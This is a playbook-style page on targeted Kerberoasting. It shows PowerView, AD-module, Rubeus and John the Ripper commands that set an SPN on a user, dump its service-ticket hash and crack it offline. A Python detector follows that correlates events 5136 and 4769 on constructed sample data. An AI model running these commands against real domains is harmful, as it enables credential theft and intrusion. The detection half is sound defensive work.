
# Set SPN

This abuse can be carried out when controlling an object that has `GenericAll`, `GenericWrite`, `WriteProperty` or `Validated-SPN` rights over the target. Members of the Account Operators group usually have those permissions.

The attacker can add an SPN (`ServicePrincipalName`) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting.

### Targeted Kerberoasting - Set SPN

* With GenericAll or GenericWrite, a target user's SPN can be set to anything that is unique in the forest.
* We can then request a TGS for that SPN without special privileges. The TGS can be Kerberoasted.

Enumerate permissions for RDPUsers on ACLs using PowerView:

{% code overflow="wrap" %}

```powershell
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
```

{% endcode %}

Check if the user already has a SPN set:

{% code overflow="wrap" %}

```powershell
# PowerView
Get-DomainUser -Identity supportuser | select serviceprincipalname

# AD module
Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName
```

{% endcode %}

Set an SPN for the user:

{% code overflow="wrap" %}

```powershell
# PowerView
Set-DomainObject -Identity support1user -Set @{serviceprincipalname='dcorp/whatever1'}

# AD module
Set-ADUser -Identity support1user -ServicePrincipalNames @{Add='dcorp/whatever1'}
```

{% endcode %}

Kerberoast the user:

{% code overflow="wrap" %}

```powershell
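# Request the service ticket and write the hash to a file
Rubeus.exe kerberoast /outfile:targetedhashes.txt

# Crack the hash offline with John the Ripper
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt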
```

{% endcode %}
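From the defender's side, the sequence above leaves two correlated records: a 5136 event (directory object modified) adding `servicePrincipalName` to a user object, followed by a 4769 event (TGS requested) for that same account. The following is an added example, not part of the original playbook; the sample events, the `example.local` domain, the 30-minute window and the DN-to-account map are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not from a real log). Field names follow Windows
# Security events 5136 (directory object modified) and 4769 (TGS requested).
EVENTS = [
    {"EventID": 5136, "Time": "2024-05-01T10:00:05", "SubjectUserName": "student1",
     "ObjectDN": "CN=support1user,CN=Users,DC=example,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "dcorp/whatever1", "OperationType": "%%14674"},
    {"EventID": 4769, "Time": "2024-05-01T10:01:40",
     "TargetUserName": "student1@EXAMPLE.LOCAL",
     "ServiceName": "support1user", "TicketEncryptionType": "0x17"},
    # Benign noise: SPN registered on a computer object, unrelated AES ticket.
    {"EventID": 5136, "Time": "2024-05-01T09:00:00", "SubjectUserName": "WEB01$",
     "ObjectDN": "CN=WEB01,CN=Computers,DC=example,DC=local", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "HTTP/web01.example.local", "OperationType": "%%14674"},
    {"EventID": 4769, "Time": "2024-05-01T09:05:00",
     "TargetUserName": "alice@EXAMPLE.LOCAL",
     "ServiceName": "WEB01$", "TicketEncryptionType": "0x12"},
]
# Assumption: DN -> sAMAccountName was resolved from the directory beforehand,
# because 5136 records the DN while 4769 records the service account name.
SAM_BY_DN = {"CN=support1user,CN=Users,DC=example,DC=local": "support1user"}
VALUE_ADDED = "%%14674"  # 5136 OperationType meaning "Value Added"

def find_targeted_kerberoast(events, sam_by_dn, window=timedelta(minutes=30)):
    """Pair each SPN added to a user object with TGS requests for that account
    made within `window` afterwards."""
    hits = []
    for add in events:
        if not (add["EventID"] == 5136 and add["ObjectClass"].lower() == "user"
                and add["AttributeLDAPDisplayName"].lower() == "serviceprincipalname"
                and add["OperationType"] == VALUE_ADDED):
            continue
        account = sam_by_dn.get(add["ObjectDN"], "").lower()
        t_add = datetime.fromisoformat(add["Time"])
        for req in events:
            if req["EventID"] != 4769 or not account:
                continue
            delta = datetime.fromisoformat(req["Time"]) - t_add
            if req["ServiceName"].lower() == account and timedelta(0) <= delta <= window:
                hits.append({"modified_by": add["SubjectUserName"], "account": account,
                             "spn": add["AttributeValue"],
                             "requested_by": req["TargetUserName"],
                             "rc4": req["TicketEncryptionType"].lower() == "0x17"})
    return hits

if __name__ == "__main__":
    for hit in find_targeted_kerberoast(EVENTS, SAM_BY_DN):
        print(hit)
```

Event 5136 is only written when "Audit Directory Service Changes" is enabled and the object's SACL audits writes, so the correlation depends on that auditing being in place.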

